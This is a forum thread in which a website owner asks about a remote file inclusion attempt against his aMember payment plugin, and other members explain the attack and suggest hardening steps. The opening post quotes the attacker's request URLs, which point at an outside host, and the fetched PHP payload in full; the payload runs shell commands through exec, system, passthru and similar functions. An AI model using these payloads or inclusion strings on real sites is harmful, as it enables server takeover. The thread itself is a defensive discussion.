I run a script on my site that tells me which visitor (logged by IP) is viewing which pages. I have a visitor on my site right now coming in under multiple IP addresses and one of the URL's listed under one of his IPs is: /amember/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://rooting.sitesled.com/test.txt? Now I'm not sure if this is legit or not, but nobody should be digging around within my aMember plug-in directories, let alone tacking on what look like commands back to a php file. The contents of test.txt were: <?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this Server is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } exit; ?> If anyone can give me an idea of what's going on here, I'd appreciate it.
It's very likely an automatic script scanning for vulnerabilities in the linkpoint plugin. If you are not using Linkpoint to process payments, simply delete or rename the linkpoint.inc.php file. Also, you should report this hack attempt to sitesled.com which seems to be a freehosting service. Tell them to terminate the "rooting" account ASAP. Tomas
You are seeing some Brazillian script kiddies attempting to hack your website using a known exploit called a "Remote File Inclusion". They're trying to take over your website. There is a good article HERE on some things to do to prevent these attacks.
TomFra brings up a great point (one I'm going to double check on my sites). Be sure to remove ALL plugins (protection and payment) that you are not using from your server to minimize risk. Also be sure to double check your CHMOD on the various directories to ensure that they are not vulnerable to local hacking as well. A good idea to double check your configurations every now and then.
Wow thanks for the heads-up guys. I'll report that and blow away the extra plug-ins. Learn something every day :-/
Hum... this script or dweeb is also trying to hit this which is the file that WordPress creates. /index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://rooting.sitesled.com/test.txt%3f On a side note, the only reason I noticed this was because I have a WordPress plug-in running called Useronline which logs and displays this information. I installed it on a whim to try it out. I never would have known about this otherwise :-O What do you guys use to monitor stuff like this? Anything? Wow, even more coincidental, that page where the info is listed was cached so at the moment I hit that page to cache it, that's when they were up to no good. Had the cache not been on, I would have missed it as well. Coincidence? I think the hacker gods are on my side on this one ;-)
What should they be? I get the whole read,write,execute thing but I always get confused about which needs to be which. For example, it looks like my payment directory and the one, paypal_r directory in it are at 755. However the actual paypal_r.inc.php file is at 644. So I get that the file is NOT executable by the world which makes sense, but the folder for it is and that's what always confuses me.
Rob thanks for the link. That was very helpful. I tested my site for the page vulnerability and it passed (whew!) But I see what they're trying to do now... going through each payment plug-in to see if any of them has the vulnerability.
That seems OK. The dirs should usually be set to 755 which means "executable & readable by everyone", but not writeable. Usually, if you haven't done any special CHMODding to CHMODs 666 or 777 (writable by everyone - meaning every user on the same physical server or virtual environment). Some files can be CHMODded to CHMODs such as 666 (writable by everyone) or 777 (writable and executable by everyone) and it would still be safe. It depends on the file type and other security precautions. Now I don't want to sound like a mentor or anything, but the number 1 safety precaution everyone should do, in my opinion, would be to move from a shared hosting account (including those so called "reseller hosting" accounts) to a Virtual Private Server (or even a full dedicated server). You can get a decent VPS at a very reasonable price these days, usually not much higher than some shared hosting accounts and if you get a managed one with a decent control panel software (does not have to be cPanel). It has a lot of advantages, better security including because the VPS environment is separated from the other VPSes on the physical server so it is not shared by hundreds of thousands or other customers (and some of them could be even black-hat hackers). There are many safety precautions one could do to make life of the hacker kiddies harder but that would be a long story. Tomas
A couple of easy strokes are also to not name your directory amember and to remove the Powered by Amember footer. In some instances I've also adjusted form field names to prevent targeted scripts from detecting without a little extra effort.
Excellent. Thanks a ton for all this advice guys. I noticed the minute I deleted all the extra payment plug-ins, whoever it was went away. They were obviously targeting aMember :-/ So, yeah, I'll be renaming my directory tonight - another late night project. In case you're curious what the free hosting company said about this, here's the response. I appreciated that response. Tomas do you have any suggestions for hosts with really good VPS services? Seems like finding a host you really like is hard to do.
As for the VPS suggestions - when I search for some dedicated server or VPS deals, I check the WebHostingTalk.com forums. The VPS offer forum is at http://www.webhostingtalk.com/forumdisplay.php?f=104 . The last VPS I had was from http://www.a2b2.com - it's a UK based company with servers mostly in the UK and US so you can pick the preferred location. I can now see on their web that their prices have gone up but I know the owner makes some special deals in the WHT forums from time to time. They were good enough for me, but as always, your experience may differ. I am no longer hosting with them because I got a full dedicated server from another company and split it into VPSes myself. Some personal VPS hosting suggestions: Choose OpenVZ/Virtuozzo virtualization over Xen if you have no specific needs for Xen or get a really good deal on it (both have advantages and disadvantages), some standard Linux distribution such as 32-bit version of CentOS 5 or another Redhat derivate. If you really need cPanel, be prepared to pay $8-$15 a month extra for it and make sure the VPS has at least 512M guaranteed RAM. If you are used to another control panel (e.g. Plesk, DirectAdmin), choose that if you get a chance. Personally, I've never liked Ensim. LXAdmin should be a good choice. You may also see "Hosting In a Box" being offered - it's basically the same control panel as LXAdmin but with some core differences in installed VPS software (not using Apache for example), that should be OK as well. HiB is best suited for low specs VPSes. Don't be surprised if you get 100-400GB bandwidth allowance per month and your old shared hosting offered something like 2000GB. They were lying! The whole shared hosting business is full of ****. The overselling in the shared hosting industry have gotten out of control. If you don't know how much traffic your web needs, take a look at some current and past month stats in Awstats or similar traffic logging software. I bet even 100GB will be more than enough unless you are in the HD video or some heavy multimedia streaming business. Now if all of this sounds weird to you, just get a fully managed VPS account and the hosting company should take care of most of it. Managing VPS is not that hard anyway, once everything is setup and if you are using cPanel or something similar, most of the updates are taken care of automatically. And don't forget to ask the webhosting company to install CSF firewall for you (or an alternative of course, but I like CSF) and harden the VPS in general - for example using certificate authentication instead of plain text passwords for root SSH etc. Again, those are just some personal suggestions, opinions always differ Tomas
Hey thanks for taking the time to provide all that detail. That was much appreciated. I'll check out the forums you mention there, do some research and get myself set up. I did upgrade my current site to PHP 5.2.3 to take advantage of the better security for now but I think a VPS solution is necessary if I'm attracting the attention of hackers :-/ Again, thanks for all the feedback guys. Excellent as usual.